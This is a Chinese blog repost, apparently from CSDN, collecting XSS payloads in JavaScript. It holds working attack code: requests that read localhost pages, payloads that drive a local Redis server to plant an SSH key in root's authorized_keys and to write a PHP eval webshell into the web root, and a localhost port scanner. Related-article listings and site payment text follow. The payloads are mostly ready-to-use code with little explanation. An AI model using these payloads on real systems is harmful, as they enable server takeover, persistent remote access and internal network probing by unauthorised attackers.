XSS 相关 payload 集合

最新推荐文章于 2024-07-29 22:50:36 发布
最新推荐文章于 2024-07-29 22:50:36 发布
阅读量139 收藏
点赞数
文章标签: php 数据库 运维
原文链接:http://www.cnblogs.com/hac425/p/9534698.html
版权

Ajax 获取数据

GET

function loadXMLDoc()
{
    var xmlhttp;
    if (window.XMLHttpRequest){// code for IE7+, Firefox, Chrome, Opera, Safari
        xmlhttp=new XMLHttpRequest();
    }
    else{// code for IE6, IE5
        xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
    }
    xmlhttp.onreadystatechange=function(){
        if (xmlhttp.readyState==4 && xmlhttp.status==200){
            document.getElementById("out").innerHTML=xmlhttp.responseText;
        }
    }
    xmlhttp.open("GET","http://127.0.0.1:80/",true);
    xmlhttp.send();

}


var a =document.createElement("a");
a.id = "out";
bd = document.getElementsByTagName("body")[0];
bd.appendChild(a);


loadXMLDoc();

POST 写 redis

写 ssh 公钥

var keydir = "/root/.ssh";
var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('eval \'' + 'redis.call(\"set\", \"hacked\", "\\r\\n\\nssh-rsa AAAAB... virusdefender@LiYangs-MacBook-Pro.local\\n\\n\\n\\n\"); redis.call(\"config\", \"set\", \"dir\", \"' + keydir + '/\"); redis.call(\"config\", \"set\", \"dbfilename\", \"authorized_keys\"); ' + '\' 0' + "\r\n");

var cmd = new XMLHttpRequest();
cmd.open("POST", "http://127.0.0.1:6379");
cmd.send('save\r\n');

写 php webshell

<a id="flag">pwn</ a>
level=low_273eac1c
<script>
var xmlHttp;
if(window.XMLHttpRequest){
    xmlHttp = new XMLHttpRequest();
}
else{
    xmlHttp = newActiveXObject("Microsoft.XMLHTTP");
}
var formData = new FormData();
formData.append("0","flushall"+"\n"+"config set dir /var/www/html/"+"\n"+"config set dbfilename shell.php"+"\n"+'set 1 "\\n\\n<?php header(\'Access-Control-Allow-Origin:*\');eval($_GET[_]);?>\\n\\n"'+"\n"+"save"+"\n"+"quit");
xmlHttp.open("POST","http://127.0.0.1:6379",true);
xmlHttp.send(formData);
</script>

来源

https://xz.aliyun.com/t/2607#toc-2
https://strcpy.me/index.php/archives/751/

端口扫描

payload

var TagName = document.getElementsByTagName("body")[0];
ports=[443,80,81,88,6379,8000,8080,8088];
for(var i in ports){
    var script =   document.createElement("script");
    poc = "var data = '" + ports[i] + " OPEN; '; console.log(data);"
    script.setAttribute("src","http://127.0.0.1:" + ports[i]);
    script.setAttribute("onload", poc);
    TagName.appendChild(script);
}

来源

https://xz.aliyun.com/t/2607#toc-2

转载于:https://www.cnblogs.com/hac425/p/9534698.html

weixin_30487201
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XSS-Payload
03-04
XSS-Payload项目提供的有效负载集合是一个宝贵的资源,对于安全社区来说,能够提高测试的覆盖率,帮助找出可能的XSS漏洞,确保Web应用的安全性。不过,使用时需注意遵循合法权限和法规,避免对他人系统造成不必要的...
XSS_Cheat_Sheet_2020_Edition:xss裂缝模糊测试payload的最佳集合2020版
03-19
XSS_Cheat_Sheet_2020_Edition简介白帽赏金平台xss突破模糊测试有效替代的最佳集合2020版该备忘清单可用于攻击猎人,安全分析,渗透测试人员,根据应用的实际情况,测试不同的有效载荷,并观察响应内容,查找网络...
2024年网络安全最全【XSS平台】使用,简单 payload 项目的创建(1),分享一点面试小经验
2401_84301948的博客
05-11 659
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Tiny-XSS-Payloads:一组微小的XSS Payload,可以在不同的上下文中使用。 https:tinyxss.terjanq.me
02-03
Tiny-XSS-有效载荷短XSS有效负载的集合,可以在不同的上下文中使用。 此处提供了演示: : 当前有效负载<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM --&...
xss平台源码
09-28
2. **Payload库**:平台可能内置了丰富的XSS payload集合,方便用户选择和测试不同的攻击模式。 3. **日志记录**:平台可能记录每次攻击尝试的详细信息,包括payload、执行结果、时间戳等,帮助分析和学习。 4. **...
XSS-SQL-Master-Payloads:我的有效载荷集合XSS,SQL ...)
05-01
DOM型XSS则与页面的DOM(文档对象模型)有关,攻击者可以修改DOM中的数据,从而触发恶意脚本的执行。 SQL注入,顾名思义,是通过输入含有SQL命令的数据来欺骗数据库,获取未授权的信息或执行非法操作。攻击者可能...
这款ERP云进销存系统,直接封神
魔法标记
07-29 441
一套用php写的ERP云进销存系统,快速部署,直接使用,简直是小公司和个体户的神器。
WordPress原创插件:搜索引擎抓取首图seo图片
最新发布
爱酷码的博客
07-29 250
WordPress原创插件:搜索引擎抓取首图seo图片。
PHP框架详解 - symfony框架
丁爸的博客
07-28 785
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
PHP表单必需字段
红客网络编程与渗透技术
07-28 193
PHP中处理表单时,确保必填字段被正确填写是非常重要的。这通常涉及到在客户端(使用HTML5)和服务器端(使用PHP)进行验证。以下是一个关于PHP表单必需字段的详细教程,包括如何在客户端和服务器端进行验证。
【WEB安全】 PHP基础文件知识完整教学中(超详细)
weixin_60838266的博客
07-29 461
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
跨境电商独立站:Shopify/Wordpress/店匠选哪个?
dongdonglin77的博客
07-26 925
商家需要根据自己的资源、能力和市场定位,选择最适合自己的建站工具,并制定有效的运营计划。通过持续的市场调研、品牌建设、流量获取和客户服务,商家可以在独立站的道路上实现可持续发展。
php判断某个目录下是否存在文件
qq_39634880的博客
07-26 411
【代码】php判断某个目录下是否存在文件。
easyadmin layui js监听返回结果,进行token验证防止连点
weixin_43652106的博客
07-29 109
easyadmin layui js监听返回结果,进行token验证防止连点
ctfshow-web入门-php特性(web147-web150_plus)
Welcome To Myon'Blog !
07-27 1211
:匹配字符串的开头。$:匹配字符串的结尾,确保整个字符串符合规则。[a-z0-9_]:表示允许小写字母、数字和下划线。*:匹配零个或多个前面的字符。/i:忽略大小写。s:匹配包括换行符在内的所有字符。D(PCRE 特有):美元符号 $ 仅匹配字符串的实际末尾,不匹配结尾的换行符。这里只需要让 $ctfshow 里面有其他字符即可满足 if 判断。在 PHP 中,命名空间(namespace)提供了一种组织代码的方式,可以避免类、函数和常量名称的冲突。
接入百度文心一言API教程
荻酷网的博客
07-21 1735
然后,编辑文章。点击AI识别摘要,然后保存即可COREAIPOWER设置暂时只支持经典编辑器.古腾堡编辑器等几个版本后支持.在比期间,你可以自己写点摘要摘要内容AL识别摘要清空。
PHP While循环
红客网络编程与渗透技术
07-28 350
while循环是 PHP 中用于重复执行代码块直到指定条件不再满足为止的基本工具。它非常灵活,但使用时需要小心,以避免无限循环和潜在的性能问题。通过合理设计循环的退出条件和使用循环控制语句,你可以有效地利用while循环来解决各种编程问题。PHP While循环客户端下载 - 红客网络编程与渗透技术。
新版海螺影视主题模板M3.1全解密版本多功能苹果CMSv10后台自适应主题
jiyc2008的博客
07-25 7137
苹果CMS2022新版海螺影视主题M3.1版本,这个主题我挺喜欢的,之前也有朋友给我提供过原版主题,一直想要破解但是后来找了几个SG11解密的大哥都表示解密需要大几百大洋,所以一直被搁置了。其中的 admin.php 为后台地址 改成你的苹果 cms 登录后台的文件例如 xxx.php。主题后台地址:海螺主题设置,/admin.php/admin/conch/theme。网站模板选择好之后一定要先访问前台,然后再进入后台设置。幻灯片推荐位自定义设置,支持分类单独设置幻灯片。WAP 手机端自适应。
CTF-NSSCTF题单[GKCTF2020]
2302_78903258的博客
07-24 1261
在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。访问/eval的路由,会设置一个delay,和你传入的get参数的delay进行比较,取较大的那个,然后setTimeout是延时函数,delay秒后就会执行第一个参数,即next(),否则就会send出timeout。是假的,但是有线索,提示说真正的flag的在。
xss常用payload
11-25
以下是几种常用的XSS Payload: 1. 弹窗XSS Payload: ```html <script>alert('XSS') ``` 2. Cookie劫持XSS Payload: ```html <script>document.location='...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值